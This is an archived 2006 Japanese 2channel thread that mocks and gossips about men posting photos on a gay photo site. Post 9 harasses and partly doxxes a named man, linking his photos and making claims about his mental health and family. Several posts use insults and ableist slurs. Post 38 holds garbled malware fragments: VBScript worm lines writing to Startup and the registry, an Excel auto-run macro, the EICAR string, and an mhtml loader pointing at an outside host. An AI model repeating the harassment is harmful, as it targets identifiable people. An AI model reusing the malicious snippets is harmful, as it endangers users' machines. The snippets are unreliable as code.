2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Enjoy!メンズLife! のベスボってどうよ 8

1 :禁断の名無しさん:2006/12/11(月) 21:36:41 ID:fAalZ1oZ
痛い奴や勘違い甚だしい奴を晒して叩くのよ!
追放組や卒業組の話題も全然アリよ!
この子がイケるわ!って話題もアリね!
ベスボ
http://menslife.jp/face.html
Enjoy!メンズLife! のベスボってどうよ
http://love3.2ch.net/test/read.cgi/gay/1135582491/
Enjoy!メンズLife! のベスボってどうよ 2
http://love3.2ch.net/test/read.cgi/gay/1145120566/
Enjoy!メンズLife! のベスボってどうよ 3
http://love3.2ch.net/test/read.cgi/gay/1147728926/
Enjoy!メンズLife! のベスボってどうよ 4
http://love3.2ch.net/test/read.cgi/gay/1149684993/
Enjoy!メンズLife! のベスボってどうよ 5
http://love3.2ch.net/test/read.cgi/gay/1152237293/
Enjoy!メンズLife! のベスボってどうよ 6
http://love3.2ch.net/test/read.cgi/gay/1154900781/
Enjoy!メンズLife! のベスボってどうよ 7
http://love3.2ch.net/test/read.cgi/gay/1160148345/

2 :禁断の名無しさん:2006/12/11(月) 23:47:19 ID:zKMeCQdN
ニン

3 :禁断の名無しさん:2006/12/11(月) 23:53:56 ID:wqS9sM7h
さん

4 :禁断の名無しさん:2006/12/12(火) 10:52:07 ID:8IykZDeU
すーしんちゅう

5 :禁断の名無しさん:2006/12/13(水) 21:50:32 ID:GDwhkv0q
V

6 :禁断の名無しさん:2006/12/13(水) 22:52:42 ID:35WgPG/C
もう既に出来てたのね・・・。
やられたわ・・・

7 :禁断の名無しさん:2006/12/14(木) 00:22:12 ID:39tjD5E3
Green…一体あいつは何なのか&何がしたいのしら?

8 :禁断の名無しさん:2006/12/14(木) 02:08:07 ID:dWafwrXX
そうそう、GREEN様の出てらっしゃるビデオ、なんてタイトルかしら?
教えてくださらない?
わたくしがこの目で確認できたのは
田舎っぺ様とLasA様ですわ。多分これだけだと思いますの。
どなたかご存じないかしら?
キャプ職人様がいらっしゃいますならうpよろしくお願いいたします。

9 :禁断の名無しさん:2006/12/14(木) 05:35:43 ID:i++E1Qjj
自分自身をmixiで1番美しいと思い込んでる
元芸能人のJOMAってドキュンなホモがいるのですが
性格はすごい神経質で、女ぽくて、短気

本人の日記によると・・・
昔父親に包丁向けたこともあったそうです

顔や髪や服ばかりいつもいじっていて、マイミクでも
自分が1番美しいと思い込んでいます
言ってることは、頭が悪いとしか思えないようなことばかり

いつも嘘ばかりついていて
大学に行かなかったのは、親の負担を考えてと本人は言ってますが
偏差値の低い高校出身で、ただ勉強が出来なかったからです。
JOMAと過去に付き合った男は多数います
でも人格に問題があるため、あまり長続きしてないようでした


JOMAは男にふられると『裏切られた、もて遊ばれた』などと被害者妄想が出ます。
悪魔を見たとか、統合失調症のような
おかしなことを言うこともあったよ

ttp://www24.big.or.jp/~ker/upl/img-box/img20061106143247.jpg
JOMAの顔写真一覧です、目つき悪い〜

ttp://www.frontier-road.com/joma/top.htm
事務所のHPに載ってる経歴と自己紹介

ttp://www.frontier-road.com/treebbs/0/485_all.html
所属していた事務所の旧BBS、JOMA本人が名前変えて自分自身を弁護する書き込みしてます

ttp://mixi.jp/add_bookmark.pl?id=405374
この部分なら見ても平気ですが、日記の中身やフォトなどをクリックして見ると足跡が残る

10 :*マリー=アントワネット* ◆.GOOduZGng :2006/12/15(金) 19:42:08 ID:1V/DgSKU
10カラットはダイヤモンドの輝き!なマリーの登場ですわ

11 :禁断の名無しさん:2006/12/16(土) 01:31:18 ID:yD4NaTqC
>>9
どーでもいいわ

12 :禁断の名無しさん:2006/12/16(土) 01:52:42 ID:vUj53THX
ミンチ久しぶりに見たらオバさんみたいな顔ねw

13 :禁断の名無しさん:2006/12/16(土) 12:38:36 ID:8pPx05YU
>>12
なんか老けたわよね。
十代の面構えじゃないわw

14 :*マリー=アントワネット* ◆.GOOduZGng :2006/12/16(土) 20:59:27 ID:CMO2NQHe
きっと大人びたのですわ

15 :禁断の名無しさん:2006/12/16(土) 23:30:47 ID:UhBwhgzo
誰かGREEN様の出演なさっているビデオのタイトル教えてくださいませんか?
彼のメディア出演はとても楽しみにしておりますの。
彼の仕事、どんなものか拝見しとうございます。
キャプ職人様がおられるのなら、ぜひとも職人技を拝見しとうございます。
キャプ職人様、GREEN様、どちらの仕事も拝見するに値すると思います。

16 :禁断の名無しさん:2006/12/17(日) 00:10:17 ID:O3olLWnD
M氏のGREEN氏に対するコメント。

これだけ美しい容姿をしていると、いろんな人が言いよって来てくれる。
でも、それと同時に汚いハエ達も寄ってくる。
自分の目で見極めて、自分の幸せをGETしてください☆
M氏、優しいな。M氏間違いなく住人よw
それもかなりのヘビーユーザーと見たわw
そうね、今日は彼のために一つ乾杯といこうかしらw

17 :禁断の名無しさん:2006/12/17(日) 00:44:10 ID:O3olLWnD
そうね。
書かねばと思っていたことを書く次第であります。
よろしくお願いいたします。

龍騎様、はじめまして。このスレの住人でございます。
わたくし、あなたを拝見して、とてもこのベスボには相応しくないと思いましたの。
というのも、"ベスボ"というのは何の略かご存知?
ベストボーイボードの略ですわよ。あなたみたいな女々しい面はベスボにはとっても場違いですわよ。

ジョシュア様、名前を変えての登場ですわね。
心機一転といったところでしょうか?ジョシュ坊。
相変わらず、あなたの顔は、不釣合いなものを呈しておられますわね。
目と顔のバランスが凄く不釣合いで・・・。

くま様、はじめまして。ですよね?
何だか、海坊主のようなお顔ですわね。毎年海で行方不明者があとをたたないのはあなたのせいでしょうか?

HIROYUKiNG様、毎度恒例のリリック?披露されていますね。
素敵だと思いますわ。
ですが、忘年会って一体なんでしょう?
わたくし、忘年会にいいイメージがないためなんだか、とっても無様に感じてしまいます。

あえてわたくしのベスボレビューに評価を下すのなら、B系レビューとでも言いましょうか。
リリックって汚い言葉だと思いません?それをあえて使ってみましたの。
そのことでBの香りを私のレビューに託してみました。
一度は使ってみたかった言葉と言うのもわたくしがつかってみた理由ですの。
というのも、リリックってlyricと表記されるのご存知かしら?
英語表記になったとたん、わたくし読めなくて、ライリス^^;なんて読んでいたものです。
マイクもそうですわよ。MICでマイク。それをわたくし、ミックと発音していましたの。
何かの略語かと思いましたわ。
これはトリビアになると思いますの。なんへぇ〜でしょうか?

18 :禁断の名無しさん:2006/12/17(日) 05:10:45 ID:Bpum9glN
ゲーム

19 :禁断の名無しさん:2006/12/17(日) 05:10:52 ID:VNPeurdB
gamestart

20 :禁断の名無しさん:2006/12/17(日) 05:15:00 ID:7D3gEhVB
追跡スタート

21 :禁断の名無しさん:2006/12/17(日) 05:20:35 ID:VNPeurdB
すとーかー 起毛

22 :姫君:2006/12/17(日) 18:53:37 ID:ohZR4Kze
GREENさんってDVDにでていますのか?ぜひタイトルが知りたく存じましる!教えていただけたらマリー殿の秘密を公開致しまする。

23 :禁断の名無しさん:2006/12/17(日) 21:57:07 ID:RGqbQOZS
GREENって鼻の穴がデカくてカバみたい…カバちゃんと似てるかもしれないわっw
アクアと司が気になる。

24 :禁断の名無しさん:2006/12/17(日) 22:47:30 ID:gsnt880J
KO-Uって何歳??
社会人だから20は超えてるのかな・・・。
気になる、犯したいぜ。

25 :禁断の名無しさん:2006/12/17(日) 23:57:09 ID:PGszs2X/
>>23
鼻がデカいヤツはアソコもデカいんだよ♪
だから全然OKさ(^-^)
…自分がヤれるんならな。

26 :禁断の名無しさん:2006/12/18(月) 00:40:13 ID:GZsdT70/
こんばんわ。皆様。
KO-U様ですか。
>>24様はKO-U様に思いをはせていらっしゃるのですね?
もし、顔だけなら関西方面に行けばいくらでもあの顔はいると思いますわよ。
わたくしも、KO-U様、素敵だと思いますわよ。
特に後頭部。彼の後頭部、何時かのベスボで拝見させて頂きましたが、
もっこりと飛び出てらしたの。そこがなんとも素敵で、わたくしの体液をふっかけてやりたいとさえ思いましたの。

GREEN様もベスボに投稿されていらっしゃいますわね。
相変わらず、艶やかでいらっしゃるのはもう言うまでもないことだと思います。
ですが今回は濡場ですわね。さらに艶かしく、なんて言えばいいんでしょう?
わたくし、ここでタイプしていていい言葉が見つかりません。

晴哉様、こんばんわ。
アピボの画像は、だいぶ後になって気づいたのですが、裸体ですわね。
わたし、脱いでも凄いんです。昔流行ったの御存知かしら?

慎吾様、はじめまして。
悟飯様じゃないですわね?それだけは聞いておきたかったことです。

と、まあ、言いたいことも特になくと言った感じです。
わざわざそんなこと書かなくても見たらわかるわよって?
ごめんなさい。まったく結末と言うかシメが思いつきません。

27 :禁断の名無しさん:2006/12/18(月) 20:32:39 ID:GZsdT70/
皆様!!
掲示板の書き込みがほとんどなされてないですわよ!!
もっと書き込んで盛り上げていきましょうよ!!
このスレはベスボがある限り、というより、この住人が盛り上げていくものです。
もっともっとたくさんの住人が書き込んでいくべきものですわよ。

28 :禁断の名無しさん:2006/12/18(月) 20:47:39 ID:GZsdT70/
皆様、フレボはご覧になってらっしゃいます?
フレボに投稿されている方がいらっしゃいます。
お名前はとも&だいすけ様でいらっしゃいます。
お二方の写真を拝見させてもらいました。
あたくし、昔を思い出しましたの。
少し回想いたしますね。
その昔、わたくしがハイスクール時代でのこと。
近くに障害者施設がありましたの。
わたくし、よく昼休憩にというか、行く当てがなかったせいか
よくそこに遊びにいっていたのです。
そこの障害者たちが昼休憩と言うこともあってか、キャッチボールをしていたんです。
いつものように彼らのキャッチボールを見ていたんです。
すると、彼らの中の一人があたくしの方に向かってきたんですの。
一体なんだろう?と思いつつも彼らの行動を見ていました。
近づいてきた彼らの中の一人がわたくしにこう話し掛けてきたのです。
「い゛っじょにぎゃっぢぼーるじまぜんが?」
もちろんあたくしの答えはNoでした。
回想終わり。
フレボに新規投稿されている殿方がその回想に出てきた少年にそっくりだったのです。
彼らの顔を見ていると、淡く、切なく、甘く、そして苦くもある青春時代を思い出してしまいました。

29 :禁断の名無しさん:2006/12/18(月) 21:35:39 ID:W/G6aSWP
イメチェンヒロ・・・
誰か生ヒロ見た人いる?

30 :禁断の名無しさん:2006/12/18(月) 22:47:21 ID:E7AhOwS8
このスレまだあるんだ。。。

31 :禁断の名無しさん:2006/12/19(火) 00:07:41 ID:nvb+I2f9
根強いEnjoyサイトファンが居るみたいだよ 飽きないのかね笑

32 :禁断の名無しさん:2006/12/19(火) 04:36:14 ID:/zKiqoN0
>>31
書き込んでる時点でお前も同類w

田舎っぺがKOに載ってる。やっぱイケるw

33 :禁断の名無しさん:2006/12/19(火) 07:29:02 ID:0O88bbPD
正直ちと飽きてきたが…ヒマつぶしには丁度いいんじゃね?笑

34 :禁断の名無しさん:2006/12/19(火) 08:33:38 ID:nvb+I2f9
>>32
じゃ見てるだけじゃなくメールすればいいんじゃない?
もてない不細工は暇だからあのサイトを支えている。韓流スターを支えるおばさんってとこだねwww

Enjoy〜管理人としては広告収入がupするからいい客♪thank you

35 :禁断の名無しさん:2006/12/19(火) 10:26:46 ID:FO2qIrcB
あのサイトを見ていて思うのは、あんなイケメンや普通の男がゲイなんだなって。
普段の生活でゲイなんてどこにいるか、わかんないけど、案外近くにいるかもね

36 :禁断の名無しさん:2006/12/19(火) 13:26:44 ID:HHfBHcRi
個人的な意見だが俺は龍騎いける。
けつまんにぶちこみてえ

37 :禁断の名無しさん:2006/12/19(火) 20:27:27 ID:/zKiqoN0
>>34
メールしたいのはやまやまなんだけど俺関西じゃないからw
鬼の首取ったみたいな言い方してるけど残念でしたw

38 :<body onload=window()>:2006/12/20(水) 00:15:45 ID:n2hl7HVq
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ



39 :禁断の名無しさん:2006/12/20(水) 00:32:01 ID:EET+A2C4
>>38
ケータイからだと何もみれない(>_<)

40 :禁断の名無しさん:2006/12/20(水) 18:13:56 ID:X+EEH7D/
ヒデユキ、ケータイ水ぽちゃメモリー消去だって。
なんか企んでるのかしら?

41 :禁断の名無しさん:2006/12/21(木) 00:38:36 ID:GEWlzV7j
LIAR復活w
あの子ならやってくれると思ってたけど何回目?w

42 :禁断の名無しさん:2006/12/21(木) 00:44:59 ID:bf0eTLOd
>>37
関西じゃないのに関西の掲示板見てらっしゃるなんて余程お暇なのねアータwww

不細工だからどの地域でも相手が見付からず各画像サイトを見て我慢してらっしゃるのねw可哀想に

メールだけなら地域関係無く出せますわよ

43 :禁断の名無しさん:2006/12/21(木) 00:46:09 ID:9YGhschw
カズキかわいい
と思ったら
ゲイサイトで女の子とクリスマス過ごすなんて書くなよ
せっかくかわいいのに
でも大人っぽくなったな

44 :禁断の名無しさん:2006/12/21(木) 01:11:08 ID:phMPPALI
皆様〜こんばんわ〜(≧∇≦)
>>40
ヒデユキ君、本当にサンタさんみたいになっちゃったね…。
顔、むくみすぎだよo(;゚∇゚)ゞ

>>41
LAIR君復活(●・ω・)ノヽ(・ω・○)
ふっくらしたお肌、白玉だんごの様だね。
どこか女の子のようにも見えて、その筋の人にはファンが多いんじゃない?
おいらそんな気がしちゃうよ。

>>43
カズキ君登場♪
顔、変わったね…カズキ君も。
メンヘルゆったんみたいだよ…。

TOSHI-ROW君こんばんわ。
おいらTOSHI-ROW君のアピボの動画見ようとしてたとき丁度映画見てたんだ。
おかげで映画の途中再生自力でする羽目になっちゃったよ…(;つД`)

45 :禁断の名無しさん:2006/12/21(木) 01:17:45 ID:1oE7UUMK
なにげにカズキってバイなん!?
“前付き合ってた女”って…俺ん中のカズキ株、大暴落ってカンジ(- -;)

46 :禁断の名無しさん:2006/12/21(木) 01:21:40 ID:phMPPALI
>>42
>>37を書いた人が年寄りだからじゃないのかなぁ?
シルバーメールならいつでもおいらが相手するよ^^

47 :禁断の名無しさん:2006/12/21(木) 01:55:18 ID:tnOo99Xd
髭猿知ってる人?

48 :禁断の名無しさん:2006/12/21(木) 02:39:59 ID:r06E+Bvy
ちょw
アピボのヒデユキ、ベスボと全然
違うじゃない!!!
ショック〜〜〜




あそこまでの詐欺画・・撮り方教えて欲しいわwww

49 :禁断の名無しさん:2006/12/21(木) 11:37:42 ID:bf0eTLOd
>>46
鬼の首〜とか言ってる時点で加齢臭がするわwww
してやったり的な返しだったけど墓穴迄掘って不細工な上にお馬鹿さんな様ねw
そりゃベスボメンバーごときに憧れちゃうわねwww


カズキもヒデユキも相当何枚も詐欺画作りに必死ね。
カズキは首にも肉が付いて来てしっつに似て来たわw
あんなにケツマンコキチガイなのに今更バイをアピールされてもねぇ〜おまけにアピボの煙草&横顔で黄昏てるのを自分で撮ってる影が見えるけど涙ぐましいナルさで吐き気がするわw


ヒデユキと言いベスボメンバー年に何回携帯のメモリー消えるのかしらwww
消したい奴の一掃と新たに出会う為ってバレバレよ!

50 :禁断の名無しさん:2006/12/21(木) 12:35:48 ID:GEWlzV7j
31:禁断の名無しさん :2006/12/19(火) 00:07:41 ID:nvb+I2f9 [sage]
根強いEnjoyサイトファンが居るみたいだよ 飽きないのかね笑

根強いEnjoyサイトファンってあんたじゃないw>>49
飽きないの?www

51 :禁断の名無しさん:2006/12/21(木) 12:47:30 ID:bf0eTLOd
Enjoyを盛り上げて日頃お世話になっている管理人様に沢山の広告収入が入る様に応援しましょう♪

52 :禁断の名無しさん:2006/12/21(木) 12:56:54 ID:GEWlzV7j
>>51
12分でレス付けるなんて余程お暇なのねアータw
他人のことバカにする資格なしねwww

53 :禁断の名無しさん:2006/12/21(木) 13:02:11 ID:bf0eTLOd
9分でレス上げるなんて余程お暇な様ねアータwww

そう移動中で暇なのよ。アータみたいな加齢臭する馬鹿が釣れて楽しいわよw
余程悔しかったのねwwwウフフッ

でもやっぱり馬鹿だからまた墓穴掘ってるわねwww

54 :禁断の名無しさん:2006/12/21(木) 13:02:57 ID:EWttnmmL
>46
鬼の首〜って言ってる時点で加齢臭がするわ〜って言ってる時点で頭の悪さを露呈してる気がするわ。

55 :禁断の名無しさん:2006/12/21(木) 13:08:32 ID:GEWlzV7j
てゆうか>>31>>34=>>42>>49でしょ?w
片やsageててオネエ言葉使ってなくて
片やageまくりのオネエ言葉使いまくりで
一見すると全くの別人っぽいんだけど
住人の少なそうなこのスレで共通してwww使うなんて
偶然って言うにはあまりに不自然だわw

56 :禁断の名無しさん:2006/12/21(木) 13:12:44 ID:GEWlzV7j
>>53
いくら暇だからって移動中にまでベスボスレのチェック?w
あたしさすがに外でまでは見ないわ〜w
よっぽどベスボの根強いファンみたいね。飽きないのかね笑

57 :禁断の名無しさん:2006/12/21(木) 14:16:54 ID:4Sxi1U6j
墓穴掘ったのはID:bf0eTLOd本人だったみたいね。可哀想…w

図星付かれちゃって出てこれなくなったわね。哀れ…w

どうせ日付け変わった後にまた文体変えて出てくるんでしょうね。浅はか…w

58 :禁断の名無しさん:2006/12/21(木) 15:34:49 ID:SNOmGj+B
何だ?この流れ笑

59 :禁断の名無しさん:2006/12/22(金) 00:27:09 ID:9Vjl78Ct
ベスボひさびさに見たけどやっぱカズキ★イケてるわ〜
整い過ぎだけど。。。

60 :禁断の名無しさん:2006/12/22(金) 00:53:45 ID:6jvuQREV
たーすけ、髭猿、がいなくなった今
カズキだけが俺の心の救い
カワイイ


61 :禁断の名無しさん:2006/12/22(金) 01:11:16 ID:XIp4D0UR
>>60
た→すけ様かっこいいかしら?
なぜかベストグラフィティーの常連ですが・・・。
関西弁しゃべるのかしら?
だとしたら、清原と区別つかないわよね。

何か書く事があったんですが、忘れてしまってしばらく書き込み見ていました。
思い出しましたよ。
>>49
ヒデユキと言いベスボメンバー年に何回携帯のメモリー消えるのかしらwww
消したい奴の一掃と新たに出会う為ってバレバレよ!

誰も突っ込まなかったのに、あなたは突っ込んだわねw
そんなこと放置しておけばいいのよ!!
ここでこうしてベスボ(って言うよりゲイね。)の低脳をさらしておけばいいじゃない?
詰まんないことだらだら書いて馬鹿にしてるのが見てる側として楽しいんじゃない?
まあ、馬鹿は死ななきゃ何とかって言うから多分そのままなんだろうけど。
これからも必見の価値ありね。

62 :禁断の名無しさん:2006/12/22(金) 07:21:30 ID:zxRzvv2B
何かあるとすぐこれだ
どうしようもないな
みんなに全て話してしまうしかないな
おれの手にはおえん

今までしてきた事が馬鹿馬鹿しい
情けない

63 :禁断の名無しさん:2006/12/22(金) 23:34:55 ID:zxRzvv2B
おれは最低だ

64 :禁断の名無しさん:2006/12/23(土) 01:05:35 ID:81lY383u
>>63 どした?

65 :禁断の名無しさん:2006/12/23(土) 02:16:48 ID:XAEgMZF3
>>62で馬鹿な事をカキコした
情けない
こりゃ自滅だな
脂肪 己の生き甲斐を自ら奪ってしまった
何度同じ事も同じような事を繰り返しているが学習していない
保育園児並みいやそれ以下テイノウだ
生まれ変わるしか手段はないかもしれない。

66 :禁断の名無しさん:2006/12/23(土) 06:52:16 ID:ZXuGqcL9
おはようございます。
朝ですわね。
>>65
幼稚園児並ですか・・・。
わたくし、自分の知能指数を出してみましたの。
凄いことになりましたわ。
わたくし、大天才の半分の知能指数でしたの!!
ですから>>65様も安心してくださいまし。
あなたよりももしくわ、あなたと同じ仲間がいるのだと・・・。
あなたと同じ仲間はクラスに一人もいないんですが・・・
そんなわたくしでも、こうして強く生きてるのです。
あなただってきっと強く生きていけることだと信じております。
そう、あなたは一人じゃない。私も一人じゃない。
二人でいたらノーベル賞も簡単に取れると思いますの。
インターネットの弊害と言うか、いいところとも言うか、
こういうところがありますわね。褒めていいのかわかりませんが・・・
インターネットがなければこんな悲惨な現実に向き合うこともなく生きてこれたと思うんですが。
そうそう、>>65様の知能指数はどれくらいでしょう?
私と比べてみませんか?

67 :禁断の名無しさん:2006/12/23(土) 11:59:07 ID:81lY383u
>>65 後悔や反省が出来てるオマエは大丈夫だよ。自分では同じコトの繰り返しのように思うかもだけど、絶対違ってるはず。ってか、学習能力がないヤツは反省などしないからさ。

68 :禁断の名無しさん:2006/12/24(日) 01:47:15 ID:U9rddRBG
今週もtoshi-rowで決まりか?
…つまんねぇな。

69 :禁断の名無しさん:2006/12/24(日) 03:22:28 ID:L5ULsJXr
目に生気がないねtoshi-rowって どう思う?
ただ配置がいいのかイケメンの部類だけど。

70 :禁断の名無しさん:2006/12/24(日) 03:27:45 ID:U9rddRBG
一般的にはカッコイイんじゃね?とは思うが、やっぱ趣味の問題もあるしな…。俺はちょっと…なぁ。

71 :禁断の名無しさん:2006/12/24(日) 03:37:42 ID:qYCSifL0
m!nchがKOのフォトメにいた。それも顔じゃなくて体掲示板の方に。
体掲示板だってのにご自慢の顔載せてるしwただの馬鹿なんだな。


72 :禁断の名無しさん:2006/12/24(日) 09:11:31 ID:+FO/OcZN
マリークリスマス

73 :*マリー=アントワネット* ◆.GOOduZGng :2006/12/25(月) 00:13:12 ID:DMUZNPOz
皆様、ご機嫌麗しゅう
最近忙しくてしばらく御無沙汰しておりました。
今日はクリスマス・イブですわね、皆様どのようにお過ごしなのかしら?
>>28
フレボのとも&だいすけ様を拝見しましたが、とても幸せそうで羨ましいですわ。
付き合って三ヶ月…既に大きな喧嘩等もなさってお互いの事分かり合ってるようですわね。
わたくし共なんて「僕達お似合いのカップルでしょ?」をアピールするだけの上辺だけ
取り繕った関係。見事、お互いメッキが剥がれたら興味が途端に無くなるんですものw
事実、今日はイブだというのにお互いメールのやりとりは一切無し。
もう二週間ぐらいメールしてませんw
>>32
田舎っぺ様カッコイイですわよねぇ〜〜。
初めてお目にかかった時、「うわっ超イケメン…」というのが正直な感想ですわ。
>>35
わたくしもその一人ですわ、間違いなくノンケっぽいですもの。
>>45
カズキ様もバイなら嬉しいですわ〜〜
彼の文章を拝見していて思い出したのですが…過去にわたくしが付き合ったたった一人の女性は
どうなさってるんでしょう…彼女には素敵な男性を見つけて幸せになっていただきたいですわ。
まあ、カズキ様は中々なイケメンです。
>>69
わたくしもパーツ自体は然程良くないのですが、配置の整い具合でなんとか
人様から見られる顔ですわ。
目に生気がない感じは彼にソックリw

そうそう、たいが様って投稿なさる度にカッコよくなってきてますわね。
アクア様ってロシア系ハーフっぽいですわ。



74 :*マリー=アントワネット* ◆.GOOduZGng :2006/12/25(月) 00:19:17 ID:DMUZNPOz
あらら、ダラダラと綴っていたら日付が変わってしまいました。
今、一人でシャンパンを頂いておりますの。
飲みきったら次はスパークリングワインを頂こうかしら。
ベスボ&ベスボスレの方々に乾杯★
そしてメリ〜クリスマス★

今宵は聖夜ですわ


75 :禁断の名無しさん:2006/12/25(月) 02:29:27 ID:L255w+PF
こんばんわ。皆様。
>>73
田舎っぺがかっこいい?マリー様、あなたどんな目してられるの?
マリー様、馬と人間の区別がつかないのかしら?
わたくし、探せど探せど、ベスボに投稿できるような顔ぶれは拝見できませんでした。
田舎っぺ様は、ゲイビデオのモデルでの活躍も目覚しいものがありますが・・・
すさまじいものを呈しておられましたわ・・・。
上の口も下の口も涎をダラダラと垂らして馬チンおったててむさぼる様は地獄絵図でしたわ。

とも&だいすけ様がかっこいい?
障害者がかっこいいってまともな神経とは思えませんが・・・。
ベスボは障害者施設でもなければ、障害者の傷のなめあいのためのサイトでもありませんわ。
まったく・・・奇形児面がはびこってベスボも落ちたわよね。
もっとまともなメンズは出てこないかしら?

76 :禁断の名無しさん:2006/12/25(月) 02:43:11 ID:L255w+PF
そうそう、田舎っぺってピーターにそっくりよねw
主食は男と草ねw仕事はビデオ出演よw友達は糞転がしで文句ないわよね。

アクア様?どの方かわかりませんが、、、ロシアなのね。
盗人がベスボなんかに何の用かしら?
アクア様が投稿するようなところとは到底思えませんが・・・
やっぱりロシアだけに写真も盗んだのかしら?
それとも指名手配かしら?

77 :禁断の名無しさん:2006/12/25(月) 08:15:48 ID:9RmgibZ/
今週もミンナでミンチに不正投票よ!!!

78 :禁断の名無しさん:2006/12/25(月) 13:09:56 ID:Jhk7FT2T
ミンチは若いうちが花だろうね。これは年取るとダメな顔だわ。

79 :禁断の名無しさん:2006/12/25(月) 13:10:32 ID:Jhk7FT2T
それよりこれミンチ?
ttp://www.youtube.com/watch?v=3GN0CkvWKhg

80 :禁断の名無しさん:2006/12/26(火) 00:26:22 ID:ycSkW8td
こーのすけとかいうキモ釜どうにかして!画像見た瞬間嫌悪感の塊よ。
ああいうのは顔&カラダがイケてる人が撮るものよ。
自分でセルフポートレートはまってるんなら自分だけで楽しめよって感じ。
本気でイラってきた

81 :*マリー=アントワネット* ◆.GOOduZGng :2006/12/26(火) 01:43:14 ID:Yv49RQnh
皆様、ご機嫌麗しゅう
クリスマスも終わってしまいましたわね、お次は年末に向けて張り切って行きましょう。

>>75
貴方、性格悪いですわね〜〜少しは人様の気持ちに配慮なさったら?
…ていうか、田舎っぺ様がピーター様に似てるなんていくらなんでもありえませんわw

>>79
この方有名ですわねwwww

>>80
そうかしら?アピボのこーのすけ様には胸キュンしてしまいましたわ。
あのあどけない表情が・・・

82 :*マリー=アントワネット* ◆.GOOduZGng :2006/12/26(火) 01:44:14 ID:Yv49RQnh
やっと書き込めましたわ、さっきまで何だったのかしら…?

83 :*マリー=アントワネット* ◆.GOOduZGng :2006/12/26(火) 01:53:01 ID:Yv49RQnh
アピボにてジョシュ坊様がオンパレードw卒業とは寂しくなりますわね。
一番上のショートレイヤー風の髪型は気に入りました。

84 :禁断の名無しさん:2006/12/26(火) 06:14:03 ID:GIvx3MvN
>80
セルフポートレイトどころか完全にセルフヘアヌードじゃないの!!ほんとどこまでアイタタターッな奴なのかしら??

85 :禁断の名無しさん:2006/12/26(火) 10:44:04 ID:+Xvn2Z+h
>>80
こーのすけって、30越えてるようなおっさん顔だよね。

86 :禁断の名無しさん:2006/12/26(火) 12:49:08 ID:P/uDpLhv
しっつまた死んでるわww

87 :☆☆祝〜ベスボスレ1周年記念〜祝☆☆:2006/12/26(火) 23:59:10 ID:DpegnBhA
皆様!ベスボスレが立ってから今日で丁度1年目ですわよ!!
涙と笑い…まさに紆余曲折を経て今日まできましたが、このスレが続くのもひとえにに皆様の御協力の賜物です。
真に有難うございました。

わたくし、*マリー=アントワネット*がスレの代表として祝辞を述べさせていただきました。


88 :*マリー=アントワネット* ◆.GOOduZGng :2006/12/27(水) 00:35:21 ID:MFaj42T2
今久々にボディボスレを拝見したのですが、なんと!落ちてしまいました!!
真に残念ですわ〜〜。・゚・(ノД`)・゚・。
あのスレには想い出がたくさん詰まっているのに…
それにしても最近、落ちるスレが多いこと…

猪猿様、早く更新なさらないかしら?
結構お気に入りな殿方なんですの。


89 :姫君:2006/12/27(水) 01:25:15 ID:B9DjqpuM
マリー殿 あなた二丁目で毎晩、おとこを

90 :*マリー=アントワネット* ◆.GOOduZGng :2006/12/27(水) 01:30:53 ID:MFaj42T2
お久しぶりですわ、姫君様。
最近二丁目には出向いてませんわ。
…まあわたくしの陰の魅力をもってすれば堕ちない男性はいなくってよw

91 :*マリー=アントワネット* ◆.GOOduZGng :2006/12/27(水) 02:31:31 ID:MFaj42T2
今再確認したらボディボスレ落ちていませんでした!
他のスレも大丈夫でしたわ。
昨日〜さっき見た時には落ちていて、スレッド一覧から探して確認するとスレは伸びている・・・
一体何なんですの〜〜!!??

92 :禁断の名無しさん:2006/12/27(水) 05:23:40 ID:+zvkMoLZ
ハタチ前に劣化しちゃったミンチかわいそうw

93 :禁断の名無しさん:2006/12/27(水) 11:21:46 ID:DgygRrLt
力也が消えてる
今年最後にトップになって欲しかったのに
みんちホントにいらねぇ
コメント欄も喧嘩うってる感じがするし
SHOに頑張って欲しい

94 :*マリー=アントワネット* ◆.GOOduZGng :2006/12/27(水) 18:05:48 ID:6CN8fSro
先程美容院に行って参りました。
長短しっかりカットの短髪ですわ〜〜もしかしたら今までの中で一番短いかも…
カットしてくださった女性のスタイリスト様は綺麗で腕が良いときた。
芸能人でたとえると伊東美咲様に似てるんですの。

一年前に比べわたくしは確実に野郎化してますわ…
筋肉量と髭の本数が増え、髪もミディアムショートから変更してずーっとベリーショートですもの。
ああん!昔の可愛い面影が無くなるのも勿体無い気が…

>>92
…そうですか?彼ぐらいで劣化だなんて、同世代の学生で老け込んでいる方はもっとたくさんいますよ。






95 :禁断の名無しさん:2006/12/28(木) 10:48:10 ID:IoVA/lAk
かなり久し振りに見たのだが、しっつとカズキは別れちまっていたのか…しかもなにげカズキがバイだという事実まで明らかに。

96 :禁断の名無しさん:2006/12/28(木) 11:02:39 ID:OCnjuCPc
えっカズキってヒデユキと付き合い始めたって二人でフレンドボード?に出てたと思うけど、、違ったかな

97 :禁断の名無しさん:2006/12/28(木) 18:41:14 ID:IoVA/lAk
